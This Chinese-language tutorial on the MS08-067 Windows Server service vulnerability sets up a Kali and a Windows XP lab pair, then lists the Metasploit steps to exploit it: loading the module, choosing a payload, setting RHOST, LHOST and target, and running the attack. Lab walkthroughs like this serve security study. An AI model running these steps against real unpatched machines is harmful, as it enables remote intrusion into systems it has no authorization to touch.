该文章仅做学习!学习!切勿用于任何不法用途!

一、MS08-067是什么

MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

中文名: ms08-067
外文名: ms08-067
发布日期: 2008/10/22
下载大小: 因操作系统而异
类 别: 漏洞
说 明: 微软安全公告KB958644
漏洞影响:服务器服务中的漏洞可能允许远程执行代码
发布日期:2008/10/22
下载大小:因操作系统而异。
受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta

摘要
此安全更新解决了服务器服务中一个秘密报告的漏洞。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。可以通过安装本 Microsoft 更新程序来保护计算机不受侵害。安装后,可能必须重新启动计算机。
严重等级:Windows 2000;XP;Server 2003为严重,Windows Vista;Server 2008;7 Beta为重要。
(摘自百度)

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

  service postgresql start

  初始化数据库

  msfdb init

2、进入MSF终端

  输入:msfconsole

3、搜索漏洞模块的名称和信息

  search ms08-067

4、加载漏洞模块

  use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

   show payloads

6、设置攻击载荷

   set payload  + 载荷名称

7、显示配置选项

   show options

8、设置目标地址

   set RHOST + IP地址

9、设置本地地址

   set LHOST + IP地址

10、列出所有支持的目标平台

     show targets

11、选择靶机

     set target + 数值

12、执行攻击

     run